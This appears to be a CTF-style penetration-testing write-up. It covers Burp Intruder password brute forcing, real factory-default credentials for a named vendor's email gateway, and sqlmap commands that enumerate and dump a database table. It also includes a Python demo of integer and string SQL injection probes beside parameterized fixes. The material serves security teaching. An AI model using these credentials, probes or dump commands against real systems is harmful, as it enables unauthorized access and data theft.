Guide to Web Penetration Testing: Brute Forcing and SQL Injection

Authentication Vulnerabilities

Exploiting Weak Credentials

The first challenge involves bypassing authentication through brute force techniques. The objective is to identify valid credentials by testing common passwords against a target login interface.

To execute this attack, an interception proxy like Burp Suite is essential. Capture the initial login request and send it to the Intruder module. Within the "Positions" tab, Burp automatically marks the parameters that can be modified; keep only the one to vary (typically the password field). Configure the payload settings by loading a dictionary file containing a list of frequently used passwords. Starting the attack sends one request per payload; comparing the server responses reveals which credential was accepted.

Default Vendor Credentials

When brute forcing fails, the next thing to check is whether the system still uses factory-default usernames and passwords. This challenge specifically targets the email gateway produced by Beijing Eyou Information Technology Co., Ltd. Researching public documentation reveals the standard administrative credentials for this vendor.

Using the discovered default credentials allows immediate access to the system.

Username: eyougw
Password: admin@(eyou)

Upon successful login, the flag is retrieved.

SQL Injection Techniques

SQL Injection (SQLi) vulnerabilities allow attackers to interfere with the queries an application makes to its database. The following sections demonstrate how to exploit various types of SQLi using automated tools like sqlmap.

Integer-Based Injection

This type occurs when unsanitized user input is inserted directly into a numeric comparison in a database query, without any quoting. The exploitation process involves enumerating the database structure to extract sensitive data.

We start by identifying the available databases using the target URL:

sqlmap --url="http://target-host:10080/?id=1" --dbs

Once the database name (e.g., sqli) is identified, we list its tables:

sqlmap --url="http://target-host:10080/?id=1" -D "sqli" --tables

Next, we examine the columns within the target table:

sqlmap --url="http://target-host:10080/?id=1" -D "sqli" -T "flag" --columns

Finally, we dump the contents of the specific column to retrieve the flag:

sqlmap --url="http://target-host:10080/?id=1" -D "sqli" -T "flag" -C "flag" --dump

String-Based Injection

String-based injection is similar to the integer type, but the injected value is enclosed in quotes, so payloads must account for them. The methodology for data extraction is the same.

sqlmap --url="http://target-host:10080/?id=1" --dbs
sqlmap --url="http://target-host:10080/?id=1" -D "sqli" --tables
sqlmap --url="http://target-host:10080/?id=1" -D "sqli" -T "flag" --columns
sqlmap --url="http://target-host:10080/?id=1" -D "sqli" -T "flag" -C "flag" --dump
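Added example, not code from the write-up: the integer-based and string-based defects described in the two sections above, reproduced in Python against a constructed in-memory SQLite table that borrows the write-up's sqli/flag naming, each beside the parameterized query that closes the hole. The table rows and probe strings are constructed for the demonstration.

```python
import sqlite3

# Constructed schema mirroring the write-up's database "sqli", table "flag",
# column "flag". The row contents are made up for this example.
def build_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE flag (id INTEGER PRIMARY KEY, name TEXT, flag TEXT)")
    conn.executemany("INSERT INTO flag VALUES (?, ?, ?)", [
        (1, "public", "flag{constructed-sample-1}"),
        (2, "secret", "flag{constructed-sample-2}"),
    ])
    return conn

# Vulnerable, integer-based: the id is pasted into the SQL text unquoted,
# so whatever follows the number is parsed as SQL.
def lookup_int_vulnerable(conn, user_id):
    return conn.execute(f"SELECT flag FROM flag WHERE id = {user_id}").fetchall()

# Vulnerable, string-based: the value is quoted, but a quote inside the
# input closes the literal early.
def lookup_str_vulnerable(conn, name):
    return conn.execute(f"SELECT flag FROM flag WHERE name = '{name}'").fetchall()

# Hardened, integer-based: validate the type, then bind the value so the
# driver never treats it as SQL.
def lookup_int_safe(conn, user_id):
    try:
        uid = int(user_id)  # anything that is not a whole number is rejected
    except (TypeError, ValueError):
        return []
    return conn.execute("SELECT flag FROM flag WHERE id = ?", (uid,)).fetchall()

# Hardened, string-based: bound parameter, quotes in the input stay data.
def lookup_str_safe(conn, name):
    return conn.execute("SELECT flag FROM flag WHERE name = ?", (name,)).fetchall()

# Run the same tautology probe through each variant and count rows returned.
def demo():
    conn = build_db()
    int_probe = "1 OR 1=1"             # constructed integer-based probe
    str_probe = "public' OR '1'='1"    # constructed string-based probe
    return {
        "int_vulnerable": len(lookup_int_vulnerable(conn, int_probe)),
        "int_safe": len(lookup_int_safe(conn, int_probe)),
        "str_vulnerable": len(lookup_str_vulnerable(conn, str_probe)),
        "str_safe": len(lookup_str_safe(conn, str_probe)),
    }

if __name__ == "__main__":
    print(demo())
```

The vulnerable variants return every row for a single-id request, which is exactly the leak sqlmap automates; the parameterized ones return nothing for the probe and still answer a legitimate lookup.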

Blind Injection Techniques

In scenarios where the application does not return database errors or data directly, blind injection techniques are employed.

Error-Based Injection: Although the application suppresses error messages, sqlmap can still infer data by analyzing the HTTP responses or error behavior patterns.

Boolean Blind Injection: The application responds differently depending on whether a SQL condition is true (e.g., a different content length or status code). The extraction process is the same as for standard injection, but it takes longer because the tool must query the database bit by bit.

Time-Based Blind Injection: When there is no visible difference in response content, the attack relies on inducing time delays: the database is made to wait for a set period only when the query condition is true. This method is generally slower than Boolean blind injection.

Tags: sqlmap burp-suite sql-injection web-security penetration-testing

Posted on Wed, 17 Jun 2026 17:11:03 +0000 by lucym